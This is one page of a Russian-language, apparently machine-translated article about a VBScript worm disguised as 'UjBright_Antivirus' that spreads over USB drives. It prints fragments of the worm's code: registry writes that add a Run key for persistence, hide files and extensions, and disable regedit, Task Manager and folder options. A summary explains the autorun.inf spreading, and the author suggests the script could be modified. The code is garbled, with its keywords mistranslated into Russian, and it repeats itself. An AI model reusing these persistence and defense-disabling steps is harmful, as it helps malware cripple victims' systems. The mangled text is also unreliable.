*   >> Чтение Образование Статьи >> tech >> safety

Вирус стал Anitivirus

Microsoft \\ Windows \\ CurrentVersion \\ Run \\ AutoMe", "wscript.exe" "" & & "выиграть \\ UjBright_Antivirus.vbs" ".RegWrite" HKEY_CURRENT_USER " \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Explorer \\ Advanced \\ Скрытый ", 1," REG_DWORD ".RegWrite" HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Explorer \\ Advanced \\ HideFileExt ", 1," REG_DWORD ".RegWrite" HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Explorer \\ Advanced \\ ShowSuperHidden ", 0," REG_DWORD ".

RegWrite" HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ Explorer \\ NoFolderOptions ", 1," REG_DWORD ".RegWrite" HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ Explorer \\ NoDriveTypeAutoRun ", 128," REG_DWORD ".RegWrite" HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ System \\ DisableRegistryTools ", 1," REG_DWORD ".

RegWrite" HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ System \\ DisableTaskMgr ", 1," REG_DWORD "End With Если TF выиграть и" \\ "Тогда UjBright_Antivirus.vbs Если fso.Getfile (TF) .Drive.IsReady = ложь, то WScript. Выйти End If WScript.Sleep 10000 Венд Большой Страшно файл Разве это не. Ну, не совсем на самом деле. Если вы запрограммировали со скриптами раньше, то оно не будет действительно трудно получить это. После глядя на код на некоторое время, я понял, что он сделал.

Вот это вкратце: Проверено на флэш-накопителей Проверено, если автозапуск, справочную и сценария настоящее время. Если нет, пишет autorun.inf, копию сценария. Написать Прочти меня мусор. Скрывает расширения файлов, отключает команду regedit и т.д. Sleep на 10000 секунд Короче, это был хороший небольшой скрипт, который может быть изменен. Вы можете увидеть эти концевые части, где реестр и задача яслях отключен, скрытые файлы скрыты, расширения скрыты, и т.д. .RegWrite "HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Run \\ AutoMe", "wscript.

exe" "" и выиграть и "\\ UjBright_Antivirus.vbs" "" ".RegWrite HKEY_CURRENT_USER \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Explorer \\ Advanced \\ Скрытый", 1, "REG_DWORD" .RegWrite "HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Explorer, \\ Расширенный \\ HideFileExt ", 1," REG_DWORD ".RegWrite" HKEY_CURRENT_USER \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Explor

Page   <<  [1] [2] [3] [4] >>
Copyright © 2008 - 2016 Чтение Образование Статьи,https://ru.nmjjxx.com All rights reserved.